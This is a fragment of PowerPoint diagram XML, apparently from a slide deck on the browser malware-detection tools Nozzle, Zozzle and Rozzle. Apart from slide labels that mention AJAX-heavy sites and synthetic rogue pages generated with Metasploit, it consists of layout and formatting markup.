          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{BAEEB4BA-F991-48EC-9C7B-69D0A62F0805}" type="parTrans" cxnId="{F89F1F0A-176E-465E-970E-5BEC866F360F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{3FD10D51-290C-44A2-B49A-42AEA60D1635}" type="sibTrans" cxnId="{F89F1F0A-176E-465E-970E-5BEC866F360F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A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2,000 synthetic rogue pages generated using </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>Metasploit</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{FFB605CB-8D98-4A66-83AD-304B2A2A3C05}" type="parTrans" cxnId="{03393624-1832-4055-A14A-06AAADE55B1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{1CAA3A87-AD6C-4C8E-ADA0-AADE4630E5E9}" type="sibTrans" cxnId="{03393624-1832-4055-A14A-06AAADE55B1B}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0" smtClean="0">
              <a:latin typeface="+mj-lt"/>
              <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
            </a:rPr>
            <a:t>10 popular AJAX-heavy sites</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" dirty="0">
            <a:latin typeface="+mj-lt"/>
            <a:cs typeface="Calibri" pitchFamily="34" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4BF4D51D-DF84-4E0F-8CD1-4CD5789EE4E3}" type="parTrans" cxnId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B315838F-C176-4805-8DEC-9BC11BD25D9D}" type="sibTrans" cxnId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" type="pres">
      <dgm:prSet presAssocID="{C156226F-41F8-4C7F-9438-1530F832FC6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3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" presName="box" presStyleLbl="node1" presStyleIdx="0" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E924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AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" type="pres">
      <dgm:prSet presAssocID="{C11AFB3E-E495-4E70-964A-A0FF7D3E924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B10207-A1CE-48EA-9B48-CA29FC989295}" type="pres">
      <dgm:prSet presAssocID="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" presName="box" presStyleLbl="node1" presStyleIdx="1" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA1312B1-E36D-4993-ACDF-2299664C6124}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC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5BF02F-2C6F-4153-9A00-E35B97A656E3}" type="pres">
      <dgm:prSet presAssocID="{78A9692A-5B4C-40AF-8E22-6B8248126FC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05F9F-9DE8-4639-BF94-509C1521AE4A}" type="pres">
      <dgm:prSet presAssocID="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}" presName="spacer" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" presName="comp" presStyleCnt="0"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" presName="box" presStyleLbl="node1" presStyleIdx="2" presStyleCnt="3"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{54C60950-B23B-4769-ACE5-1F976D1AA119}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1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650A36-B1A6-43DF-AF0D-427E18142423}" type="pres">
      <dgm:prSet presAssocID="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A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1A9AE6-6E50-45E6-84C6-3129087AEEA4}" type="presOf" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9816829D-4939-494B-8F89-A1C3F157C491}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" srcOrd="1" destOrd="0" parTransId="{6A767E8E-0D70-4D86-8E25-6514472640C4}" sibTransId="{5624F10E-DC3C-4643-A92B-2A499E9B5B28}"/>
    <dgm:cxn modelId="{03393624-1832-4055-A14A-06AAADE55B1B}" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" srcOrd="1" destOrd="0" parTransId="{FFB605CB-8D98-4A66-83AD-304B2A2A3C05}" sibTransId="{1CAA3A87-AD6C-4C8E-ADA0-AADE4630E5E9}"/>
    <dgm:cxn modelId="{4E0B9344-0095-4F22-B9CF-F74E304840F9}" type="presOf" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{B3F7BD4C-8E86-4361-A951-50D72554647D}" type="presOf" srcId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{F89F1F0A-176E-465E-970E-5BEC866F360F}" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" srcOrd="1" destOrd="0" parTransId="{BAEEB4BA-F991-48EC-9C7B-69D0A62F0805}" sibTransId="{3FD10D51-290C-44A2-B49A-42AEA60D1635}"/>
    <dgm:cxn modelId="{4B3302B9-7E61-4966-A608-E4AC74801481}" type="presOf" srcId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{4F374E0A-6811-4814-A2AB-DE280861A299}" type="presOf" srcId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{80A65863-D51E-408B-BA1C-AB70CDB9B6F4}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" srcOrd="2" destOrd="0" parTransId="{72EF87C9-BEC4-4AC0-9FFD-727D2930318D}" sibTransId="{F621A551-C7AC-44B7-A205-322EF7C41F94}"/>
    <dgm:cxn modelId="{5733991C-1730-40AF-BD6F-395BAFCB1B50}" type="presOf" srcId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{F816EBB1-EB9B-406F-A0C0-61B104D6B5BA}" type="presOf" srcId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{B9615220-11A6-4427-AB0A-5F0C83A70E86}" type="presOf" srcId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{8632DEF2-EC4D-4AA5-ACEF-01461BA7069B}" type="presOf" srcId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{AE756FDE-7982-47BD-B91B-FEC168AA97F6}" type="presOf" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{50275A42-0064-435A-92C3-40D4A9BE1846}" type="presOf" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{317D533E-2015-4FA3-8B41-8C9F126D5CD4}" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{5F8A38D8-C238-4AC2-BA9A-291A8131AC3D}" srcOrd="1" destOrd="0" parTransId="{782B4437-07A0-4E5A-85C7-3FF83CC4E84E}" sibTransId="{E01572F0-8222-4FB7-9B54-517D0F0F4B27}"/>
    <dgm:cxn modelId="{991C40FB-2835-4658-91F1-DD8F5A204C83}" type="presOf" srcId="{6EAF02F3-E587-4EB9-A86A-556B72CEB441}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{D9C1FDC9-8BF4-4E00-9692-8877F41825B7}" srcId="{C156226F-41F8-4C7F-9438-1530F832FC6B}" destId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" srcOrd="0" destOrd="0" parTransId="{DC5B9E11-4B1E-490A-ADA4-504825673E7D}" sibTransId="{A119868A-DCF7-4BD0-AD85-13F46B2D9472}"/>
    <dgm:cxn modelId="{41A9BCF2-8707-41FC-9D44-4099B78040EA}" type="presOf" srcId="{CF0792BF-D7F2-4D19-BB48-7CD92EB28F8A}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{E7EF07F8-C21B-4584-99F3-6AD70EE138E6}" srcId="{C11AFB3E-E495-4E70-964A-A0FF7D3E9244}" destId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" srcOrd="0" destOrd="0" parTransId="{4BF4D51D-DF84-4E0F-8CD1-4CD5789EE4E3}" sibTransId="{B315838F-C176-4805-8DEC-9BC11BD25D9D}"/>
    <dgm:cxn modelId="{4A497791-AFEB-49AD-89DE-1AF7DDF93655}" type="presOf" srcId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{8DC6C1A1-44C1-4CB5-92BE-24040A905363}" type="presOf" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{58F6D32E-BEEA-41B4-8C26-2580C08482EF}" type="presOf" srcId="{793ECA7A-46AE-43AC-BFB2-CF4BA5E64073}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="1" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{A496AD75-EA65-4B49-BA86-8F26172FDB03}" type="presOf" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{8C8F7FF4-76D5-4F56-A9DD-66310888E9F6}" srcId="{78A9692A-5B4C-40AF-8E22-6B8248126FC7}" destId="{3D11AD2A-5602-4199-8990-A60E96D171E1}" srcOrd="0" destOrd="0" parTransId="{1DFA58F4-89F8-46BA-BB88-CEC3495411EA}" sibTransId="{3868F040-BEA2-4A7A-908D-8F7D3FE23CBF}"/>
    <dgm:cxn modelId="{904D2E4C-E531-4403-B48F-2641C7C6CA6E}" type="presOf" srcId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2665ADC8-9F4F-4001-9A60-B51A0DF9223E}" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{4F2F1122-473D-46C8-B826-D0BDFADD288B}" srcOrd="0" destOrd="0" parTransId="{A44EAEB2-4EB8-4D05-B0C6-8D7BC5798E5B}" sibTransId="{4395D986-6C88-408D-BCB6-3F6BE3F6D187}"/>
    <dgm:cxn modelId="{980E564E-D23C-4723-B042-2ADCE2DCED49}" type="presOf" srcId="{2F1AEAF1-4A53-49AE-831D-AC3A3342E5A1}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{5507C57A-7F2D-45C3-8230-14B1223F3657}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{FCE838FF-FD0B-45A2-BDF5-70CC69E0107E}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{08B24302-0FEE-4A65-9627-5399FD6B15F4}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{97C2C215-A715-423E-8374-04EC02A09379}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{6645CA92-980E-41D2-B5F3-E2072D6C6013}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{BBB12518-29C1-41F5-8DE8-BFDB16B7C89E}" type="presParOf" srcId="{6E3F2EC0-DA29-4CED-9A3B-301ED71D39CC}" destId="{9AF69754-DEB3-4EEA-94C8-EA30FD9F6437}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9C762BD6-F783-46CF-873F-15161699BEFD}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{01B10207-A1CE-48EA-9B48-CA29FC989295}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{9AFAAE09-AC24-4054-8CD6-266FB5A3363C}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{AE9D8650-2CFC-4149-9951-49D9EA896B77}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{9A3C8223-AC47-4B18-9618-E1811FA42B51}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{12523354-9216-464D-9347-424ECBBBBDF1}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{DA1312B1-E36D-4993-ACDF-2299664C6124}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{424A1B9A-E068-48A2-9FB5-97E0BA2216BF}" type="presParOf" srcId="{CA940ABE-4B21-4FFC-A887-5AB74B108067}" destId="{635BF02F-2C6F-4153-9A00-E35B97A656E3}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{966BFE71-C7D1-4B30-8FB0-1FCBBDD4EEC2}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{04805F9F-9DE8-4639-BF94-509C1521AE4A}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{E6B65A15-E796-4AFF-809B-0D634D0C3A34}" type="presParOf" srcId="{4DEB6D6A-A06F-4DD0-AD44-9F03B6557A62}" destId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{1C1DB89E-4E27-4800-897B-B3C91B2DDFAA}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{B7AF71B8-0B36-4720-B756-66BDD334ECAD}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{2DCDD182-CB29-4DDE-A1B7-ECF9D22D74C0}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{54C60950-B23B-4769-ACE5-1F976D1AA119}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#1"/>
    <dgm:cxn modelId="{3A8FE956-165C-4E32-A058-52AEC80A3975}" type="presParOf" srcId="{A0828D6B-C8A4-43E3-9741-372577DF522A}" destId="{CD650A36-B1A6-43DF-AF0D-427E18142423}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList4#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4000" b="1" dirty="0" smtClean="0"/>
            <a:t>        </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4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Nozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="48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 custT="1"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" sz="5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     </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="5400" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Zozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="4000" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/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r>
            <a:rPr lang="en-US" sz="40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Rozzle</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="40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 custFlipHor="1" custScaleX="74397" custScaleY="74397"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" type="pres">
      <dgm:prSet presAssocID="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" presName="Child1" presStyleLbl="revTx" presStyleIdx="0" presStyleCnt="3" custScaleX="177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 custScaleX="134547" custScaleY="134547"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
      </dgm:spPr>
    </dgm:pt>
    <dgm:pt modelId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" type="pres">
      <dgm:prSet presAssocID="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" presName="Child2" presStyleLbl="revTx" presStyleIdx="1" presStyleCnt="3" custScaleX="177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 custScaleX="62261" custScaleY="62261"/>
      <dgm:spPr>
        <a:solidFill>
          <a:schemeClr val="bg2"/>
        </a:solidFill>
      </dgm:spPr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1FE15CE5-EC1B-48DC-818E-6C13124A5793}" type="presOf" srcId="{9BF7A25B-01D9-44DE-AAAA-07B6F5059E80}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{E50FC239-6526-448D-81AB-49DEAB159EAD}" type="presOf" srcId="{F85D88E0-5569-483C-B80D-52DADDD67C86}" destId="{16E1C02D-E7D5-45FC-B787-772B2C997025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9C226BEB-049E-4D19-A288-CD06D362E76B}" type="presOf" srcId="{42CA8381-D83C-49DC-A535-FD3A5A280337}" destId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList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39BF0ABD-96CD-4584-995A-5F4DD9E3FE37}" type="presOf" srcId="{BE3E69EE-DBEB-4A8A-8CDA-C96E2CF47CFE}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{32EBB1F4-F2F9-4B72-AA09-5FAD606B5DB8}" type="presOf" srcId="{9CBA3949-A4A7-4783-AAC7-6B56479DFAD4}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{2C1FE753-EFCC-47A4-9090-B05D2468AF42}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{EBE48C75-D016-4F08-9F51-B3D240ACF8EC}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{403EC7F8-4D06-4206-95B5-33A54E9D8ED6}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{170CD44F-31FA-458A-99A0-9DA364AC4E8D}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{CE5C7CA3-6DCE-4749-A770-42E6DBCF7049}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{F98C0AC3-421E-4976-8531-27C2CAAC5D6E}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{CCF1E4FD-4668-46BC-89F5-3C07CB77FFCD}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{836B8372-1AC1-4C30-9C91-27561FA2BC32}" srcOrd="3" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{AD2B74A2-0CAE-4623-8297-145E1AAAFF94}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" srcOrd="4" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{9DFDCE77-BDB2-4E48-8FCC-C8EE04C5389D}" type="presParOf" srcId="{1A49931B-DD10-4453-9AAE-2E9B095ADB05}" destId="{ACA413BF-0915-4049-A5C9-7FD42C0186B3}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{A20B747F-DF5A-44C9-84B1-717D52C48211}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{74586B4C-DC6C-42F1-8E4D-88C4E6336CBF}" srcOrd="5" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{5DAA6F46-465F-4C3A-BC28-40E21C6188DE}" type="presParOf" srcId="{D62B9EF4-2EBE-48AA-93BD-359698940624}" destId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" srcOrd="6" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{DFEB8669-2BFC-4609-A2FE-434159C2B093}" type="presParOf" srcId="{47474F5A-E13F-4EA9-873E-C68EC610C1F8}" destId="{69074874-D740-4421-B6B9-9D999C367698}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2011/layout/RadialPictureList"/>
    <dgm:cxn modelId="{B94E3189-3AC7-401C-B6D9-92F60E49C90E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4000" b="1" dirty="0" smtClean="0"/>
            <a:t>        </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="4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Nozzle</a:t>
          </a:r>
